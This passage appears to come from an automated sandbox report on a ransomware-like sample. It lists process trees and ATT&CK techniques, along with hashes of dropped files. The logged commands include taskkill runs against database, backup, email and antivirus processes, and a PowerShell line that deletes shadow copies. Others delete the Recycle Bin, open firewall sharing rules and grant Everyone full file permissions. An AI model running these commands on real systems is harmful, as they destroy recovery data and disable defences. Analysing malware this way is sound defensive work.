  2⤵
  - Kills process with taskkill
  PID:336
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:316
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:396
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1324
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:1668
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1012
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1540
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:524
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:336
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:928
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:792
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:1596
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:280
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:548
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:368
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:1908
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:1316
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:1164
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:632
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:1700
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:1720
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:1456
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1472
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:780
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:788
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:516
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:436
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:240
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:1544
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:1844
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1064
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:1616
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:108
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:1764
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1696
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:336
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:1000
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:1700
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1256
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:368
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1908
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1456
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1488
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1756
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  PID:280
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1348
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpBB92.bat
  2⤵
  PID:764
- - C:\Windows\system32\mountvol.exe
    mountvol
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:928
- - C:\Windows\system32\find.exe
    find "}\"
    3⤵
    PID:1936
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{efb60be3-9a04-11eb-be03-806e6f6e6963}\
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:548
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:524
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{efb60be4-9a04-11eb-be03-806e6f6e6963}\
    3⤵
    PID:1224
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1480
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{efb60be7-9a04-11eb-be03-806e6f6e6963}\
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1764
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:1700
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1616
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1844
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1544
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1936
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1000
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:368
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:788
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1224
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:280
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Windows\bootstat.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:108
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Windows\DtcInstall.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1028
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Windows\mib.bin /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1236
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Windows\PFRO.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:560
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Windows\Professional.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Windows\setupact.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1540
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Windows\setuperr.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:584

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1319854318557003316-197025906318638110641475010914-728389704452657245-1127867321"
1⤵
PID:1584

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2041150221-139216742420531062671372683766437050058-9021598481990883376-2113466463"
1⤵
PID:576

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1654703778-11155389602389044151795034831-737151100-1693754880-416420773-862112297"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-18170060234789824731790282483-18055769162055425976-650737829-10009230921335141997"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4059233541773072486-175457095655755918-230877684-21389762091547445088407668658"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:792

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-296801976-8584194691581978723-1639195226-214708343399210340-370041931-1633028954"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:788

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1825017032-314029655-1050695464-1671124340-13061068556373221-49912996442531775"
1⤵
PID:1056

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-103128349210366574347894028281824445993-1062508143-193181904220913664181450629041"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2021900841287892872-113760999916510230921170980837534828524455347386510601004"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5986463921559380296220722059-113610604153552859792648091-185250937340686883"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1316

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1761125083170329475519035280681277835870-159683595820761129-1437285160-166953171"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:516

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1324275007754262785-1421020052-2010549880146960427610035925052003030909-592701728"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "796747103-112640587-5183849756508057593748361971453065374-1776108243153904859"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:240

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9129326561064203681220087496-655890641568894366-458022232995240479124135592"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:280

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_34517273-2f43-4f5a-94c1-ff88cc2528f3

MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_425f4355-e889-4552-bef0-f582e6786538

MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46c339e5-9a11-48b3-8311-ba753b069088

MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4a5086f0-4339-4d2e-bc25-3b01b760d7c2

MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c528b025-b2b7-4426-9f95-ec6ba1b068d6

MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa9f5f23-246a-4376-9739-fa9e86d71ec5

MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
17c36d7d199fd39342eec76b74b2ff0d

SHA1
c38ca684efe246f9b5e35eb103808c5e9708f6d9

SHA256
efd04e8eb4cd347dfb626b8868ac6133e7267716ce3cef5c3148c8bd3b56c639

SHA512
f91c970465b0acb44d1d996c2686d90b7069f7297a1cdab3e9b8afd17ac98390f4c5130a8c32939e1826af317c6a312b6b793db85fcac80f0baa54ba28088d23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
e67366f38853e94339ec59bddb0f20e7

SHA1
5acb9cf8560ba5ccffca0cae61270f2ff549562c

SHA256
41bd21a6871f599a3b38070344484d1754a5f2e25022b36ef1b8e86a0cf5c0dd

SHA512
510a117fb6fcc91c439cad3cd339f7f4f0cfd1994266cce98822320d02ec828c73c7d06ed5bca3c5b781aab205d11e3dd55a997ec7518523421c28d189e8318a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBB92.bat

MD5
1af2c796c268a8160d0d93e8866dc7b0

SHA1
6d786ee5bf9cb9b1da115ce6daffe1e7b5ef988f

SHA256
94e31962442ee5f22c9ff8f6539c214dabf49e1b672a91cb042e2c0c1369abc8

SHA512
af10c10ef2c7f976ebc52201d17c95cb2a5c433d39c7d722b0c1f56cb48fa27c07cf60e7de8c2d9974f6594212eb02568007da90e49ba3bca226efbe8943271e

Download Submit
C:\Users\Admin\AppData\Local\Temp\v.txt

MD5
f799c52b8d2fd27b13812966704cb37e

SHA1
12786536b73c3a4addfd4d38729f46e466b0188d

SHA256
e7094a1e692c7d749106114cf2acd2cfc7511276837fd50b802dded8c39217c5

SHA512
6090b10b349fd1fcf81e8c306e05a3dc53fdb410db670ddc569afdcf614eea2f61b394c359e7681ab05dfd1a58df05406e7512de9d3917f08bfd1aaa550baae8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
4ee5687175d64f04d5d9e55b5bf9925b

SHA1
557dd2ee974448c22670f74d27f470af6648e415

SHA256
7c79032e6674d0cd50a92892aef93696e0e2dc94ef9c13102f30e4081ee8d4e2

SHA512
33d2acfb2bbeb92a0d30ccf21eea130ee3b7b292598a21920dc832a0f7b7560ba5fbc0fa49cd3b1225b6cda2a7fd4a0030b99ed9e62f8e5849c6568be6909b92

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
4ee5687175d64f04d5d9e55b5bf9925b

SHA1
557dd2ee974448c22670f74d27f470af6648e415

SHA256
7c79032e6674d0cd50a92892aef93696e0e2dc94ef9c13102f30e4081ee8d4e2

SHA512
33d2acfb2bbeb92a0d30ccf21eea130ee3b7b292598a21920dc832a0f7b7560ba5fbc0fa49cd3b1225b6cda2a7fd4a0030b99ed9e62f8e5849c6568be6909b92

Download Submit
memory/108-163-0x0000000000000000-mapping.dmp

Download
memory/240-155-0x0000000000000000-mapping.dmp

Download
memory/280-106-0x0000000000000000-mapping.dmp

Download
memory/280-139-0x0000000000000000-mapping.dmp

Download
memory/308-60-0x0000000000B30000-0x0000000000B31000-memory.dmp

Filesize
4KB

Download
memory/308-62-0x000000001AEC0000-0x000000001AEC2000-memory.dmp

Filesize
8KB

Download
memory/316-127-0x0000000000000000-mapping.dmp

Download
memory/336-135-0x0000000000000000-mapping.dmp

Download
memory/336-166-0x0000000000000000-mapping.dmp

Download
memory/336-126-0x0000000000000000-mapping.dmp

Download
memory/368-141-0x0000000000000000-mapping.dmp

Download
memory/396-128-0x0000000000000000-mapping.dmp

Download
memory/436-153-0x0000000000000000-mapping.dmp

Download
memory/516-109-0x0000000000000000-mapping.dmp

Download
memory/516-151-0x0000000000000000-mapping.dmp

Download
memory/524-133-0x0000000000000000-mapping.dmp

Download
memory/524-114-0x0000000000000000-mapping.dmp

Download
memory/548-140-0x0000000000000000-mapping.dmp

Download
memory/576-110-0x0000000000000000-mapping.dmp

Download
memory/604-123-0x0000000000000000-mapping.dmp

Download
memory/632-145-0x0000000000000000-mapping.dmp

Download
memory/752-107-0x0000000000000000-mapping.dmp

Download
memory/780-111-0x0000000000000000-mapping.dmp

Download
memory/780-150-0x0000000000000000-mapping.dmp

Download
memory/788-152-0x0000000000000000-mapping.dmp

Download
memory/792-137-0x0000000000000000-mapping.dmp

Download
memory/928-136-0x0000000000000000-mapping.dmp

Download
memory/1000-165-0x0000000000000000-mapping.dmp

Download
memory/1012-132-0x0000000000000000-mapping.dmp

Download
memory/1056-119-0x0000000000000000-mapping.dmp

Download
memory/1064-160-0x0000000000000000-mapping.dmp

Download
memory/1164-108-0x0000000000000000-mapping.dmp

Download
memory/1164-167-0x0000000000000000-mapping.dmp

Download
memory/1164-144-0x0000000000000000-mapping.dmp

Download
memory/1256-75-0x00000000025E4000-0x00000000025E6000-memory.dmp

Filesize
8KB

Download
memory/1256-74-0x00000000025E0000-0x00000000025E2000-memory.dmp

Filesize
8KB

Download
memory/1256-65-0x000007FEFC661000-0x000007FEFC663000-memory.dmp

Filesize
8KB

Download
memory/1256-69-0x000000001AB40000-0x000000001AB41000-memory.dmp

Filesize
4KB

Download
memory/1256-68-0x0000000002010000-0x0000000002011000-memory.dmp

Filesize
4KB

Download
memory/1256-72-0x0000000002430000-0x0000000002431000-memory.dmp

Filesize
4KB

Download
memory/1256-63-0x0000000000000000-mapping.dmp

Download
memory/1316-112-0x0000000000000000-mapping.dmp

Download
memory/1316-143-0x0000000000000000-mapping.dmp

Download
memory/1324-129-0x0000000000000000-mapping.dmp

Download
memory/1348-171-0x0000000002000000-0x0000000002001000-memory.dmp

Filesize
4KB

Download
memory/1348-172-0x000000001ACE0000-0x000000001ACE1000-memory.dmp

Filesize
4KB

Download
memory/1348-174-0x000000001AC64000-0x000000001AC66000-memory.dmp

Filesize
8KB

Download
memory/1348-173-0x000000001AC60000-0x000000001AC62000-memory.dmp

Filesize
8KB

Download
memory/1348-175-0x00000000026E0000-0x00000000026E1000-memory.dmp

Filesize
4KB

Download
memory/1348-176-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download
memory/1456-148-0x0000000000000000-mapping.dmp

Download
memory/1472-149-0x0000000000000000-mapping.dmp

Download
memory/1540-130-0x0000000000000000-mapping.dmp

Download
memory/1544-156-0x0000000000000000-mapping.dmp

Download
memory/1584-117-0x0000000000000000-mapping.dmp

Download
memory/1588-134-0x0000000000000000-mapping.dmp

Download
memory/1596-138-0x0000000000000000-mapping.dmp

Download
memory/1596-118-0x0000000000000000-mapping.dmp

Download
memory/1596-161-0x0000000000000000-mapping.dmp

Download
memory/1612-154-0x0000000000000000-mapping.dmp

Download
memory/1616-159-0x0000000000000000-mapping.dmp

Download
memory/1620-122-0x0000000000000000-mapping.dmp

Download
memory/1668-131-0x0000000000000000-mapping.dmp

Download
memory/1696-164-0x0000000000000000-mapping.dmp

Download
memory/1700-168-0x0000000000000000-mapping.dmp

Download
memory/1700-115-0x0000000000000000-mapping.dmp

Download
memory/1700-146-0x0000000000000000-mapping.dmp

Download
memory/1716-157-0x0000000000000000-mapping.dmp

Download
memory/1720-147-0x0000000000000000-mapping.dmp

Download
memory/1720-105-0x0000000000000000-mapping.dmp

Download
memory/1756-116-0x0000000000000000-mapping.dmp

Download
memory/1764-162-0x0000000000000000-mapping.dmp

Download
memory/1768-76-0x000000001ACB0000-0x000000001ACB2000-memory.dmp

Filesize
8KB

Download
memory/1768-97-0x000000001ABB0000-0x000000001ABB1000-memory.dmp

Filesize
4KB

Download
memory/1768-84-0x0000000002900000-0x0000000002901000-memory.dmp

Filesize
4KB

Download
memory/1768-81-0x00000000028D0000-0x00000000028D1000-memory.dmp

Filesize
4KB

Download
memory/1768-77-0x000000001ACB4000-0x000000001ACB6000-memory.dmp

Filesize
8KB

Download
memory/1768-64-0x0000000000000000-mapping.dmp

Download
memory/1768-96-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

Filesize
4KB

Download
memory/1768-78-0x0000000002710000-0x0000000002711000-memory.dmp

Filesize
4KB

Download
memory/1844-158-0x0000000000000000-mapping.dmp

Download
memory/1844-125-0x0000000000000000-mapping.dmp

Download
memory/1896-121-0x0000000000000000-mapping.dmp

Download
memory/1908-142-0x0000000000000000-mapping.dmp

Download
memory/1988-124-0x0000000000000000-mapping.dmp

Download